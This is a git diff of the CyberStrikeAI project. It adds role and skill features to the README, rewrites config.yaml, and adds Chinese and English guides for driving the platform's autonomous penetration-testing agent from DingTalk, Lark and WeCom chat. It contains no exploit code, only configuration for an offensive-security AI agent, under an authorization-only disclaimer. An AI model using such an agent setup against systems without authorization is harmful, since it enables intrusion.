- **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`enabled` 字段
- **Skills 集成**:角色可附加安全测试技能。技能名称会作为提示添加到系统提示词中,AI 智能体可通过 `read_skill` 工具按需获取技能内容
- **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`skills`、`enabled` 字段。
- **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。
**创建自定义角色示例:**
@@ -158,10 +197,25 @@ go build -o cyberstrike-ai cmd/server/main.go
- api-fuzzer
- arjun
- graphql-scanner
skills:
- api-security-testing
- sql-injection-testing
enabled: true
```
2. 重启服务或重新加载配置,角色会出现在角色选择下拉菜单中。
### Skills 技能系统
- **预设技能**:系统内置 20+ 个预设的安全测试技能(SQL 注入、XSS、API 安全、云安全、容器安全等),位于 `skills/` 目录。
- **提示词中的技能提示**:当选择某个角色时,该角色附加的技能名称会作为推荐添加到系统提示词中。技能内容不会自动注入,AI 智能体需要时需使用 `read_skill` 工具获取技能详情。
- **按需调用**:AI 智能体也可以通过内置工具(`list_skills`、`read_skill`)按需访问技能,允许在执行任务过程中动态获取相关技能。
- **结构化格式**:每个技能是一个目录,包含一个 `SKILL.md` 文件,详细描述测试方法、工具使用、最佳实践和示例。技能支持 YAML front matter 格式用于元数据。
- **自定义技能**:通过在 `skills/` 目录添加目录即可创建自定义技能。每个技能目录应包含一个 `SKILL.md` 文件。
**创建自定义技能:**
1. 在 `skills/` 目录创建目录(如 `skills/my-skill/`
2. 在该目录下创建 `SKILL.md` 文件,编写技能内容
3. 在角色的 YAML 文件中,通过添加 `skills` 字段将该技能附加到角色
### 工具编排与扩展
- `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。
- `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。
@@ -363,6 +417,7 @@ knowledge:
similarity_threshold: 0.7 # 相似度阈值(0-1),低于此值的结果将被过滤
hybrid_weight: 0.7 # 混合检索权重(0-1),向量检索的权重,1.0 表示纯向量检索,0.0 表示纯关键词检索
roles_dir: "roles" # 角色配置文件目录(相对于配置文件所在目录)
skills_dir: "skills" # Skills 目录(相对于配置文件所在目录)
```
### 工具模版示例(`tools/nmap.yaml`
@@ -405,6 +460,10 @@ tools:
enabled: true
```
## 相关文档
- [机器人使用说明(钉钉 / 飞书)](docs/robot.md):在手机端通过钉钉、飞书与 CyberStrikeAI 对话的完整配置步骤、命令与排查说明,**建议按该文档操作以避免走弯路**。
## 项目结构
```
@@ -414,7 +473,9 @@ CyberStrikeAI/
├── web/ # 前端静态资源与模板
├── tools/ # YAML 工具目录(含 100+ 示例)
├── roles/ # 角色配置文件目录(含 12+ 预设安全测试角色)
├── img/ # 文档配图
├── skills/ # Skills 目录(含 20+ 预设安全测试技能)
├── docs/ # 说明文档(如机器人使用说明)
├── images/ # 文档配图
├── config.yaml # 运行配置
├── run.sh # 启动脚本
└── README*.md
@@ -439,34 +500,37 @@ CyberStrikeAI/
构建最新一次测试的攻击链,只导出风险 >= 高的节点列表。
```
## 更新日志
详细版本历史和所有变更请查看 [CHANGELOG.md](CHANGELOG.md)。
### 近期亮点
- **2026-01-11** – 新增角色化测试功能,支持预设安全测试角色
- **2026-01-08** 新增 SSE 传输模式支持,外部 MCP 联邦支持三种模式
- **2026-01-01** – 新增批量任务管理功能,支持队列式任务执行
- **2025-12-25** 新增漏洞管理和对话分组功能
- **2025-12-20** – 新增知识库功能,支持向量检索和混合搜索
## Star History
![Star History Chart](https://api.star-history.com/svg?repos=Ed1s0nZ/CyberStrikeAI&type=date&legend=top-left)
## 404星链计划
<img src="./img/404StarLinkLogo.png" width="30%">
<img src="./images/404StarLinkLogo.png" width="30%">
CyberStrikeAI 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)
## TCH Top-Ranked Intelligent Pentest Project
<div align="left">
<a href="https://zc.tencent.com/competition/competitionHackathon?code=cha004" target="_blank">
<img src="./img/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
<img src="./images/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
</a>
</div>
## Stargazers over time
![Stargazers over time](https://starchart.cc/Ed1s0nZ/CyberStrikeAI.svg)
---
## ⚠️ 免责声明
**本工具仅供教育和授权测试使用!**
CyberStrikeAI 是一个专业的安全测试平台,旨在帮助安全研究人员、渗透测试人员和IT专业人员在**获得明确授权**的情况下进行安全评估和漏洞研究。
**使用本工具即表示您同意:**
- 仅在您拥有明确书面授权的系统上使用此工具
- 遵守所有适用的法律法规和道德准则
- 对任何未经授权的使用或滥用行为承担全部责任
- 不会将本工具用于任何非法或恶意目的
**开发者不对任何滥用行为负责!** 请确保您的使用符合当地法律法规,并获得目标系统所有者的明确授权。
---
欢迎提交 Issue/PR 贡献新的工具模版或优化建议!
+145 -44
View File
@@ -5,68 +5,169 @@
# 点击右上角"设置"按钮即可修改配置
# ============================================
# ============================================
# 系统设置
# ============================================
# 前端显示的版本号(可选,不填则显示默认版本)
version: "v1.3.19"
# 服务器配置
server:
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
port: 8080 # HTTP 服务端口,可通过浏览器访问 http://localhost:8080
port: 8080 # HTTP 服务端口,可通过浏览器访问 http://localhost:8080
# 认证配置
auth:
password: # Web 登录密码,请修改为强密码
session_duration_hours: 12 # 登录有效期(小时),超时后需重新登录
session_duration_hours: 12 # 登录有效期(小时),超时后需重新登录
# 日志配置
log:
level: info # 日志级别: debug(调试), info(信息), warn(警告), error(错误)
level: info # 日志级别: debug(调试), info(信息), warn(警告), error(错误)
output: stdout # 日志输出位置: stdout(标准输出), stderr(标准错误), 或文件路径
# ============================================
# 对话相关配置
# ============================================
# AI 模型配置(支持 OpenAI 兼容 API)
# 必填项:api_key, base_url, model 必须填写才能正常运行
# 支持的 API 服务商:
# - OpenAI: https://api.openai.com/v1
# - DeepSeek: https://api.deepseek.com/v1
# - 其他兼容 OpenAI 协议的 API
# 常用模型: gpt-4, gpt-3.5-turbo, deepseek-chat, claude-3-opus 等
openai:
base_url: https://api.deepseek.com/v1 # API 基础 URL(必填)
api_key: sk-xxxx # API 密钥(必填)
model: deepseek-chat # 模型名称(必填)
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
# ============================================
# 信息收集(FOFA)配置(可选)
# ============================================
# 用于「信息收集」页面调用 FOFA API(后端代理,避免前端暴露 key)
# 也可通过环境变量配置:FOFA_EMAIL / FOFA_API_KEY(优先级更高)
fofa:
base_url: "https://fofa.info/api/v1/search/all" # 可选,留空则使用默认
email: "" # FOFA 账号邮箱(可选,建议在系统设置中填写)
api_key: "" # FOFA API Key(可选,建议在系统设置中填写)
# Agent 配置
# 达到最大迭代次数时,AI 会自动总结测试结果
agent:
max_iterations: 120 # 最大迭代次数,AI 代理最多执行多少轮工具调用
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
# 数据库配置
database:
path: data/conversations.db # SQLite 数据库文件路径,用于存储对话历史和消息
knowledge_db_path: data/knowledge.db # 知识库数据库文件路径(可选,为空则使用会话数据库),用于存储知识库项和向量嵌入,可独立复制和复用
# ============================================
# 任务管理相关配置
# ============================================
# (配置项已包含在对话相关配置中)
# ============================================
# 漏洞管理相关配置
# ============================================
# 安全工具配置
# 系统会从该目录加载所有 .yaml 格式的工具配置文件
# 推荐方式:在 tools/ 目录下为每个工具创建独立的配置文件
security:
tools_dir: tools # 工具配置文件目录(相对于配置文件所在目录)
# 工具描述模式:加载 tools 下工具时,暴露给 AI/API 使用的描述来源
# short - 优先使用 short_description(简短描述,省 token),为空时用 description
# full - 使用 description(详细描述)
tool_description_mode: full
# ============================================
# MCP 相关配置
# ============================================
# MCP 协议配置
# MCP (Model Context Protocol) 用于工具注册和调用
mcp:
enabled: false # 是否启用 MCP 服务器(http模式)
host: 0.0.0.0 # MCP 服务器监听地址
port: 8081 # MCP 服务器端口
# AI 模型配置(支持 OpenAI 兼容 API)
# 必填项:api_key, base_url, model 必须填写才能正常运行
openai:
base_url: https://api.deepseek.com/v1 # API 基础 URL(必填)
api_key: sk-xxxx # API 密钥(必填)
# 支持的 API 服务商:
# - OpenAI: https://api.openai.com/v1
# - DeepSeek: https://api.deepseek.com/v1
# - 其他兼容 OpenAI 协议的 API
model: deepseek-chat # 模型名称(必填)
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
# 常用模型: gpt-4, gpt-3.5-turbo, deepseek-chat, claude-3-opus 等
# Agent 配置
agent:
max_iterations: 120 # 最大迭代次数,AI 代理最多执行多少轮工具调用
# 达到最大迭代次数时,AI 会自动总结测试结果
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
# 数据库配置
database:
path: data/conversations.db # SQLite 数据库文件路径,用于存储对话历史和消息
knowledge_db_path: data/knowledge.db # 知识库数据库文件路径(可选,为空则使用会话数据库),用于存储知识库项和向量嵌入,可独立复制和复用
# 安全工具配置
security:
tools_dir: tools # 工具配置文件目录(相对于配置文件所在目录)
# 系统会从该目录加载所有 .yaml 格式的工具配置文件
# 推荐方式:在 tools/ 目录下为每个工具创建独立的配置文件
# 外部MCP配置
host: 0.0.0.0 # MCP 服务器监听地址
port: 8081 # MCP 服务器端口
# 外部 MCP 配置
external_mcp:
servers: {}
# 知识库配置
# ============================================
# 知识库相关配置
# ============================================
knowledge:
enabled: false # 是否启用知识检索功能
base_path: knowledge_base # 知识库目录路径(相对于配置文件所在目录)
enabled: false # 是否启用知识检索功能
base_path: knowledge_base # 知识库目录路径(相对于配置文件所在目录)
embedding:
provider: openai # 嵌入模型提供商(目前仅支持openai)
model: text-embedding-v4 # 嵌入模型名称
provider: openai # 嵌入模型提供商(目前仅支持openai)
model: text-embedding-v4 # 嵌入模型名称
base_url: https://api.deepseek.com/v1 # 留空则使用OpenAI配置的base_url
api_key: sk-xxxxxx # 留空则使用OpenAI配置的api_key
api_key: sk-xxxxxx # 留空则使用OpenAI配置的api_key
retrieval:
top_k: 5 # 检索返回的Top-K结果数量
similarity_threshold: 0.7 # 相似度阈值(0-1),低于此值的结果将被过滤
hybrid_weight: 0.7 # 混合检索权重(0-1),向量检索的权重,1.0表示纯向量检索,0.0表示纯关键词检索
# 角色配置
roles_dir: roles # 角色配置文件目录(相对于配置文件所在目录
top_k: 5 # 检索返回的Top-K结果数量
similarity_threshold: 0.7 # 相似度阈值(0-1),低于此值的结果将被过滤
hybrid_weight: 0.7 # 混合检索权重(0-1),向量检索的权重,1.0表示纯向量检索,0.0表示纯关键词检索
# ============================================
# 索引配置(用于解决 API 限制问题
# ============================================
indexing:
# 分块配置
chunk_size: 512 # 每个块的最大 token 数(默认 512),长文本会被分割成多个块
chunk_overlap: 50 # 块之间的重叠 token 数(默认 50),保持上下文连贯性
max_chunks_per_item: 0 # 单个知识项的最大块数量(0 表示不限制),防止单个文件消耗过多 API 配额
# 速率限制配置(解决 429 错误)
max_rpm: 0 # 每分钟最大请求数(默认 0 表示不限制),如 OpenAI 默认 200 RPM
rate_limit_delay_ms: 300 # 请求间隔毫秒数(默认 300),用于避免 API 速率限制,设为 0 不限制
# 建议值:200 次/分钟≈300ms, 100 次/分钟≈600ms
# 重试配置
max_retries: 3 # 最大重试次数(默认 3),遇到速率限制或服务器错误时自动重试
retry_delay_ms: 1000 # 重试间隔毫秒数(默认 1000),每次重试会递增延迟
# ============================================
# 机器人配置(企业微信、钉钉、飞书)
# ============================================
# 用于在手机端通过企业微信/钉钉/飞书与 CyberStrikeAI 对话,无需部署在服务器上也可使用
# 在系统设置 -> 机器人设置 中可配置
robots:
wecom: # 企业微信
enabled: false
token: ""
encoding_aes_key: ""
corp_id: ""
secret: ""
agent_id: 0
dingtalk: # 钉钉
enabled: false
client_id:
client_secret:
lark: # 飞书
enabled: false
app_id: ""
app_secret: ""
verify_token: ""
# ============================================
# Skills 相关配置
# ============================================
# 系统会从该目录加载所有skills,每个skill应是一个目录,包含SKILL.md文件
# 例如:skills/sql-injection-testing/SKILL.md
skills_dir: skills # Skills配置文件目录(相对于配置文件所在目录)
# ============================================
# 角色相关配置
# ============================================
# 系统会从该目录加载所有 .yaml 格式的角色配置文件
# 每个角色应创建独立的配置文件,例如:roles/CTF.yaml, roles/默认.yaml 等
roles_dir: roles # 角色配置文件目录(相对于配置文件所在目录)
+257
View File
@@ -0,0 +1,257 @@
# CyberStrikeAI 机器人使用说明
[English](robot_en.md)
本文档说明如何通过**钉钉**、**飞书**与 **企业微信** 与 CyberStrikeAI 对话(长连接 / 回调模式),在手机端即可使用,无需在服务器上打开网页。按下面步骤操作可避免常见弯路。
---
## 一、在 CyberStrikeAI 里从哪里配置
1. 登录 CyberStrikeAI Web 端
2. 左侧导航进入 **系统设置**
3. 在左侧设置分类中点击 **机器人设置**(位于「基本设置」与「安全设置」之间)
4. 按平台勾选并填写(钉钉填 Client ID / Client Secret,飞书填 App ID / App Secret
5. 点击 **应用配置** 保存
6. **重启 CyberStrikeAI 应用**(只保存不重启,机器人不会连上)
配置会写入 `config.yaml``robots` 段,也可在配置文件中直接编辑。**修改钉钉/飞书配置后必须重启,长连接才会生效。**
---
## 二、支持的平台(长连接 / 回调)
| 平台 | 说明 |
|----------|------|
| 钉钉 | 使用 Stream 长连接,程序主动连接钉钉接收消息 |
| 飞书 | 使用长连接,程序主动连接飞书接收消息 |
| 企业微信 | 使用 HTTP 回调接收消息,被动回包 + 主动调用企业微信发送消息 API |
下面第三节会按平台写清:在开放平台要做什么、要复制哪些字段、填到 CyberStrikeAI 的哪一栏。
---
## 三、各平台配置项与详细步骤
### 3.1 钉钉
**先搞清楚:两种钉钉机器人不一样**
| 类型 | 从哪里创建 | 能否做「用户发消息→机器人回复」 | 本程序是否支持 |
|------|------------|----------------------------------|----------------|
| **自定义机器人** | 钉钉群里:群设置 → 添加机器人 → 自定义(Webhook) | ❌ 不能,只能你往群里发消息 | ❌ 不支持 |
| **企业内部应用机器人** | [钉钉开放平台](https://open.dingtalk.com) 创建应用并开通机器人 | ✅ 能 | ✅ 支持 |
如果你手里是「自定义机器人」的 Webhook 地址(`oapi.dingtalk.com/robot/send?access_token=xxx`)和加签密钥(`SEC...`),**不能直接填到本程序**,必须按下面步骤在开放平台创建「企业内部应用」并拿到 **Client ID**、**Client Secret**。
---
**钉钉配置完整步骤(按顺序做)**
1. **打开钉钉开放平台**
浏览器访问 [https://open.dingtalk.com](https://open.dingtalk.com),用**企业管理员**账号登录。
2. **进入应用开发**
左侧选 **应用开发****企业内部开发** → 点击 **创建应用**(或选择已有应用)。填写应用名称等基本信息后创建。
3. **拿到 Client ID 和 Client Secret**
- 左侧点 **凭证与基础信息**(在「基础信息」下)。
- 页面上有 **Client ID(原 AppKey****Client Secret(原 AppSecret**
- 点击复制,**不要手打**,注意:数字 **0** 和字母 **o**、数字 **1** 和字母 **l** 容易抄错(例如 `ding9gf9tiozuc504aer` 中间是数字 **504** 不是 5o4)。
4. **开通机器人并选 Stream 模式**
- 左侧 **应用能力****机器人**
- 打开「机器人配置」开关。
- 填写机器人名称、简介等(必填项按提示填)。
- **关键**:消息接收方式要选 **「Stream 模式」**(流式接入)。若只有「HTTP 回调」或未选 Stream,本程序收不到消息。
- 保存。
5. **权限与发布**
- 左侧 **权限管理**:搜索「机器人」「消息」等,勾选**接收消息**、**发送消息**等机器人相关权限,并确认授权。
- 左侧 **版本管理与发布**:若有未发布配置,点击 **发布新版本** / **上线**,否则修改不生效。
6. **填回 CyberStrikeAI**
- 回到 CyberStrikeAI → 系统设置 → 机器人设置 → 钉钉。
- 勾选「启用钉钉机器人」。
- **Client ID (AppKey)** 粘贴第 3 步复制的 Client ID。
- **Client Secret** 粘贴第 3 步复制的 Client Secret。
- 点击 **应用配置**,然后**重启 CyberStrikeAI**。
---
**CyberStrikeAI 钉钉栏位对照**
| CyberStrikeAI 中填写项 | 在钉钉开放平台的来源 |
|------------------------|------------------------|
| 启用钉钉机器人 | 勾选即启用 |
| Client ID (AppKey) | 凭证与基础信息 → **Client ID(原 AppKey** |
| Client Secret | 凭证与基础信息 → **Client Secret(原 AppSecret** |
---
### 3.2 飞书 (Lark)
| 配置项 | 说明 |
|--------|------|
| 启用飞书机器人 | 勾选后启动飞书长连接 |
| App ID | 飞书开放平台应用凭证中的 App ID |
| App Secret | 飞书开放平台应用凭证中的 App Secret |
| Verify Token | 事件订阅用(可选) |
**飞书配置简要步骤**:登录 [飞书开放平台](https://open.feishu.cn) → 创建企业自建应用 → 在「凭证与基础信息」中获取 **App ID**、**App Secret** → 在「应用能力」中开通**机器人**并启用相应权限 → 发布应用 → 将 App ID、App Secret 填到 CyberStrikeAI 机器人设置 → 保存并**重启应用**。
---
### 3.3 企业微信 (WeCom)
> 企业微信目前采用「HTTP 回调 + 主动发送消息 API」的方式工作:
> - 用户发消息 → 企业微信以加密 XML **回调到你的服务器**(本程序的 `/api/robot/wecom`);
> - CyberStrikeAI 解密并调用 AI → 使用企业微信的 `message/send` 接口**主动发消息给用户**。
**配置概览:**
- 在企业微信管理后台创建或选择一个**自建应用**。
- 在该应用的「接收消息」处配置回调 URL、Token、EncodingAESKey。
- 在 CyberStrikeAI 的 `config.yaml` 中填入:
- `robots.wecom.corp_id`:企业 IDCorpID
- `robots.wecom.agent_id`:应用的 AgentId
- `robots.wecom.token`:消息回调使用的 Token
- `robots.wecom.encoding_aes_key`:消息回调使用的 EncodingAESKey
- `robots.wecom.secret`:该应用的 Secret(用于调用企业微信主动发送消息接口)
> **重要:IP 白名单(errcode 60020**
> CyberStrikeAI 使用 `https://qyapi.weixin.qq.com/cgi-bin/message/send` 主动发送 AI 回复。
> 若企业微信日志或本程序日志中出现 `errcode 60020 not allow to access from your ip`
>
> - 说明你的服务器出口 IP **没有加入企业微信的 IP 白名单**;
> - 请在企业微信管理后台中找到该自建应用的**「安全设置 / IP 白名单」**(具体入口可能因版本略有不同),将运行 CyberStrikeAI 的服务器公网 IP(如 `110.xxx.xxx.xxx`)加入白名单;
> - 保存后等待生效,再次发送消息测试。
>
> 如果 IP 未加入白名单,企业微信会拒绝主动发送消息,表现为:
> - 回调接口 `/api/robot/wecom` 能正常收到并处理消息;
> - 但手机端**始终收不到 AI 回复**,日志中有 `not allow to access from your ip` 提示。
---
## 四、机器人命令
在钉钉/飞书中向机器人发送以下**文本命令**(仅支持文本):
| 命令 | 说明 |
|------|------|
| **帮助** | 显示命令帮助与说明 |
| **列表****对话列表** | 列出所有对话的标题与对话 ID |
| **切换 \<对话ID\>****继续 \<对话ID\>** | 指定对话 ID,后续消息在该对话中继续 |
| **新对话** | 开启一个新对话,后续消息在新对话中 |
| **清空** | 清空当前对话上下文(效果等同「新对话」) |
| **当前** | 显示当前对话 ID 与标题 |
| **停止** | 中断当前正在执行的任务 |
| **角色****角色列表** | 列出所有可用角色(渗透测试、CTF、Web 应用扫描等) |
| **角色 \<角色名\>****切换角色 \<角色名\>** | 切换当前使用的角色 |
| **删除 \<对话ID\>** | 删除指定对话 |
| **版本** | 显示当前 CyberStrikeAI 版本号 |
除以上命令外,**直接输入任意文字**会作为用户消息发给 AI,与 Web 端对话逻辑一致(渗透测试/安全分析等)。
---
## 五、如何使用(要 @ 机器人吗?)
- **单聊(推荐)**:在钉钉/飞书里**搜索并打开该机器人**,进入与机器人的**私聊**,直接输入「帮助」或任意文字即可,**不需要 @**。
- **群聊**:若机器人被添加到群里,在群内只有 **@机器人** 后发送的消息才会被机器人收到并回复;不 @ 的群消息不会触发机器人。
总结:和机器人**单聊时直接发**;在**群里用时需要 @机器人** 再发内容。
---
## 六、推荐使用流程(避免漏步骤)
1. **在开放平台**:按第三节完成钉钉或飞书应用创建、凭证复制、机器人开通(钉钉务必选 **Stream 模式**)、权限与发布。
2. **在 CyberStrikeAI**:系统设置 → 机器人设置 → 勾选对应平台,粘贴 Client ID/App ID、Client Secret/App Secret → 点击 **应用配置**
3. **重启 CyberStrikeAI 进程**(否则长连接不会建立)。
4. **在手机钉钉/飞书**:找到该机器人(单聊直接发,群聊需 @机器人),发「帮助」或任意内容测试。
若发消息没反应,先看 **第九节排查****第十节常见弯路**
---
## 七、配置文件示例
`config.yaml` 中机器人相关片段示例:
```yaml
robots:
dingtalk:
enabled: true
client_id: "your_dingtalk_app_key"
client_secret: "your_dingtalk_app_secret"
lark:
enabled: true
app_id: "your_lark_app_id"
app_secret: "your_lark_app_secret"
verify_token: ""
```
修改后需**重启应用**,长连接在应用启动时建立。
---
## 八、如何验证是否可用(无需钉钉/飞书客户端)
在未安装钉钉或飞书时,可用**测试接口**验证机器人逻辑是否正常:
1. 先登录 CyberStrikeAI Web 端(保证有登录态)。
2. 使用 curl 调用测试接口(需携带登录后的 Cookie):
```bash
# 将 YOUR_COOKIE 替换为登录后获得的 Cookie(浏览器 F12 → 网络 → 任意请求 → 请求头中的 Cookie)
curl -X POST "http://localhost:8080/api/robot/test" \
-H "Content-Type: application/json" \
-H "Cookie: YOUR_COOKIE" \
-d '{"platform":"dingtalk","user_id":"test_user","text":"帮助"}'
```
若返回 JSON 中含有 `"reply":"【CyberStrikeAI 机器人命令】..."`,说明命令处理正常。可再试 `"text":"列表"``"text":"当前"` 等。
接口说明:`POST /api/robot/test`(需登录),请求体 `{"platform":"可选","user_id":"可选","text":"必填"}`,响应 `{"reply":"回复内容"}`
---
## 九、钉钉发消息没反应时排查
按顺序检查:
0. **笔记本合盖睡眠 / 断网后**
钉钉、飞书均使用长连接收消息,睡眠或断网后连接会断开。程序会**自动重连**(约 5 秒~60 秒内重试)。唤醒或恢复网络后稍等一会儿再发消息;若仍无反应,可重启 CyberStrikeAI 进程。
1. **Client ID / Client Secret 是否与开放平台完全一致**
从「凭证与基础信息」里**复制粘贴**,不要手打。注意数字 **0** 与字母 **o**、数字 **1** 与字母 **l**(例如 `ding9gf9tiozuc504aer` 中间是 **504** 不是 5o4)。
2. **是否在保存配置后重启了应用**
机器人长连接在**应用启动时**建立。在 Web 端点击「应用配置」只写入配置文件,**必须重启 CyberStrikeAI 进程**后钉钉连接才会生效。
3. **看程序日志**
- 启动后应看到:`钉钉 Stream 正在连接…``钉钉 Stream 已启动(无需公网),等待收消息`
- 若出现 `钉钉 Stream 长连接退出` 且带错误信息,多为 **Client ID / Client Secret 错误**或**开放平台未开通流式接入**
- 在钉钉里发一条消息后,若有收到,应有日志:`钉钉收到消息`;若没有,说明钉钉未把消息推到本程序(回头检查开放平台「机器人」是否开通、是否选用 **Stream 模式**)。
4. **开放平台侧**
应用需已**发布**;在「机器人」能力中需开启**流式接入(Stream)** 用于接收消息(仅 HTTP 回调不够);权限管理里需有机器人接收、发送消息等权限。
---
## 十、常见弯路(避免踩坑)
- **用错了机器人类型**:在钉钉**群里**添加的「自定义」机器人(Webhook + 加签)**不能**用来做对话,本程序只支持**开放平台「企业内部应用」**里的机器人。
- **只保存没重启**:在 CyberStrikeAI 里改完机器人配置后必须**重启应用**,否则长连接不会建立。
- **Client ID 抄错**:开放平台是 `504` 就填 `504`,不要填成 `5o4`;尽量用复制粘贴。
- **钉钉只开了 HTTP 回调没开 Stream**:本程序通过 **Stream 长连接**收消息,开放平台里机器人的消息接收方式必须选 **Stream 模式**
- **应用没发布**:开放平台里修改了机器人或权限后,要在「版本管理与发布」里**发布新版本**,否则不生效。
---
## 十一、注意事项
- 钉钉、飞书均**仅处理文本消息**;其他类型(如图片、语音)会提示暂不支持或忽略。
- 会话与 Web 端共用同一套对话数据:在机器人里创建的对话会在 Web 端「对话」列表中看到,反之亦然。
- 机器人执行逻辑与 **`/api/agent-loop/stream`** 一致(含进度回调、过程详情写入数据库),仅不向客户端推送 SSE,最后将完整回复一次性发回钉钉/飞书/企业微信。
+254
View File
@@ -0,0 +1,254 @@
# CyberStrikeAI Robot / Chatbot Guide
[中文](robot.md)
This document explains how to chat with CyberStrikeAI from **DingTalk**, **Lark (Feishu)**, and **WeCom (Enterprise WeChat)** using long-lived connections or HTTP callbacks—no need to open a browser on the server. Following the steps below helps avoid common mistakes.
---
## 1. Where to configure in CyberStrikeAI
1. Log in to the CyberStrikeAI web UI.
2. Open **System Settings** in the left sidebar.
3. Click **Robot settings** (between “Basic” and “Security”).
4. Enable the platform and fill in credentials (DingTalk: Client ID / Client Secret; Lark: App ID / App Secret).
5. Click **Apply configuration** to save.
6. **Restart the CyberStrikeAI process** (saving alone does not establish the connection).
Settings are written to the `robots` section of `config.yaml`; you can also edit the file directly. **After changing DingTalk or Lark config, you must restart for the long-lived connection to take effect.**
---
## 2. Supported platforms (long-lived / callback)
| Platform | Description |
|----------------|-------------|
| DingTalk | Stream long-lived connection; the app connects to DingTalk to receive messages |
| Lark (Feishu) | Long-lived connection; the app connects to Lark to receive messages |
| WeCom (Qiye WX)| HTTP callback to receive messages; CyberStrikeAI replies via WeComs message sending API |
Section 3 below describes, per platform, what to do in the developer console and which fields to copy into CyberStrikeAI.
---
## 3. Configuration and step-by-step setup
### 3.1 DingTalk
**Important: two types of DingTalk bots**
| Type | Where its created | Can do “user sends message → bot replies”? | Supported here? |
|------|-------------------|-------------------------------------------|------------------|
| **Custom bot (Webhook)** | In a DingTalk group: Group settings → Add robot → Custom (Webhook) | No; you can only post to the group | No |
| **Enterprise internal app bot** | [DingTalk Open Platform](https://open.dingtalk.com): create an app and enable the bot | Yes | Yes |
If you only have a **custom bot** Webhook URL (`oapi.dingtalk.com/robot/send?access_token=...`) and sign secret (`SEC...`), **do not** put them into CyberStrikeAI. You must create an **enterprise internal app** in the open platform and obtain **Client ID** and **Client Secret** as below.
---
**DingTalk setup (in order)**
1. **Open DingTalk Open Platform**
Go to [https://open.dingtalk.com](https://open.dingtalk.com) and log in with an **enterprise admin** account.
2. **Create or select an app**
In the left menu: **Application development****Enterprise internal development****Create application** (or choose an existing app). Fill in the app name and create.
3. **Get Client ID and Client Secret**
- In the left menu open **Credentials and basic info** (under “Basic information”).
- Copy **Client ID (formerly AppKey)** and **Client Secret (formerly AppSecret)**.
- Use copy/paste; avoid typing by hand. Watch for **0** vs **o** and **1** vs **l** (e.g. `ding9gf9tiozuc504aer` has the digits **504**, not 5o4).
4. **Enable the bot and choose Stream mode**
- Left menu: **Application capabilities****Robot**.
- Turn on “Robot configuration”.
- Fill in robot name, description, etc. as required.
- **Critical**: set message reception to **“Stream mode”** (流式接入). If you only enable “HTTP callback” or do not select Stream, CyberStrikeAI will not receive messages.
- Save.
5. **Permissions and release**
- Left menu: **Permission management** — search for “robot”, “message”, etc., and enable **receive message**, **send message**, and other bot-related permissions; confirm.
- Left menu: **Version management and release** — if there are unpublished changes, click **Release new version** / **Publish**; otherwise changes do not take effect.
6. **Fill in CyberStrikeAI**
- In CyberStrikeAI: System settings → Robot settings → DingTalk.
- Enable “Enable DingTalk robot”.
- Paste the Client ID and Client Secret from step 3.
- Click **Apply configuration**, then **restart CyberStrikeAI**.
---
**Field mapping (DingTalk)**
| Field in CyberStrikeAI | Source in DingTalk Open Platform |
|------------------------|----------------------------------|
| Enable DingTalk robot | Check to enable |
| Client ID (AppKey) | Credentials and basic info → **Client ID (formerly AppKey)** |
| Client Secret | Credentials and basic info → **Client Secret (formerly AppSecret)** |
---
### 3.2 Lark (Feishu)
| Field | Description |
|-------|-------------|
| Enable Lark robot | Check to start the Lark long-lived connection |
| App ID | From Lark open platform app credentials |
| App Secret | From Lark open platform app credentials |
| Verify Token | Optional; for event subscription |
**Lark setup in short**: Log in to [Lark Open Platform](https://open.feishu.cn) → Create an enterprise app → In “Credentials and basic info” get **App ID** and **App Secret** → In “Application capabilities” enable **Robot** and the right permissions → Publish the app → Enter App ID and App Secret in CyberStrikeAI robot settings → Save and **restart** the app.
---
### 3.3 WeCom (Enterprise WeChat)
> WeCom uses a **“HTTP callback + active message send API”** model:
> - User sends a message → WeCom sends an **encrypted XML callback** to your server (CyberStrikeAIs `/api/robot/wecom`).
> - CyberStrikeAI decrypts it, calls the AI, then uses WeComs `message/send` API to **actively push the reply** to the user.
**Configuration overview:**
- In the WeCom admin console, create or select a **custom app** (自建应用).
- In that apps settings, configure the message **callback URL**, **Token**, and **EncodingAESKey**.
- In CyberStrikeAIs `config.yaml`, fill in:
- `robots.wecom.corp_id`: your CorpID (企业 ID)
- `robots.wecom.agent_id`: the apps AgentId
- `robots.wecom.token`: the Token used for message callbacks
- `robots.wecom.encoding_aes_key`: the EncodingAESKey used for callbacks
- `robots.wecom.secret`: the apps Secret (used when calling WeCom APIs to send messages)
> **Important: IP allowlist (errcode 60020)**
> CyberStrikeAI calls `https://qyapi.weixin.qq.com/cgi-bin/message/send` to actively send AI replies.
> If logs show `errcode 60020 not allow to access from your ip`:
>
> - Your servers outbound IP is **not in WeComs IP allowlist**.
> - In the WeCom admin console, open the custom apps **Security / IP allowlist** settings (name may vary slightly), and add the public IP of the machine running CyberStrikeAI (e.g. `110.xxx.xxx.xxx`).
> - Save and wait for it to take effect, then test again.
>
> If the IP is not whitelisted, WeCom will reject active message sending. You will see that `/api/robot/wecom` receives and processes callbacks, but users **never see AI replies**, and logs contain `not allow to access from your ip`.
---
## 4. Bot commands
Send these **text commands** to the bot in DingTalk or Lark (text only):
| Command | Description |
|---------|-------------|
| **帮助** (help) | Show command help |
| **列表** or **对话列表** (list) | List all conversation titles and IDs |
| **切换 \<conversationID\>** or **继续 \<conversationID\>** | Continue in the given conversation |
